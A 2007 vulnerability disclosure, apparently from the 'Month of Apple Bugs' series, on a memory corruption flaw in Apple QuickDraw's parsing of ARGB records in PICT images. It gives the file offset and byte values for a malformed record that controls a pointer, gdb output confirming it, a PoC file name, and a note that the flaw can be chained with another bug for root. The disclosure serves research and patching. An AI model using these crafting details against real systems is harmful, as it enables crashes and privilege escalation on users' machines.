Tuesday, 23 January 2007

Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 23-01-07
Description:: QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB records (Alpha RGB) within PICT images, that leads to an exploitable memory corruption condition (ex. denial of service, so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).
Exploit:: A specially crafted PICT image with a malformed ARGB record can abuse this issue for subverting the pointer passed to the _GetSrcBits32ARGB() function. Up to 3 bytes can be controlled, as the last one is a fixed value (0x70, incremental) and isn't influenced by the image data structure::
at offset 662:

06 ED BB ED AD ED DE
[length] [-] [R] [-] [G] [-] [B]

ADED -> 0xdead
BB+0x03 -> 0xbe
plus fixed value: 0x70

result: 0xdeadbe70

This is enough for pointing at an absolutely different address
(ex. at heap or stack space,user controlled). A valid address will most probably
cause the application to continue execution, although an invalid one will lead to
a memory access violation (KERN_INVALID_ADDRESS exception).

06 ED BB ED AD ED BF
[length] [-] [R] [-] [G] [-] [B]
result: 0xbfadbe70


(gdb) break *0x91782c44
Breakpoint 1 at 0x91782c44
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
(...)
Reading symbols for shared libraries . done

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) x/4x $eax
0xbfadbe70: 0x00000000 0x00000000 0x00000000 0x00000000

Once execution continues, the address is repeatedly incremented:

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $2 = (void *) 0xbfadbe90 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $3 = (void *) 0xbfadbe94 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $4 = (void *) 0xbfadbe98 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $5 = (void *) 0xbfadbe9c (...)
While arbitrary code execution might be possible, until further research is done, it can't be stated as currently viable condition.
Links::
MOAB-23-01-2007
PoC:: MOAB-23-01-2007.pct

No comments: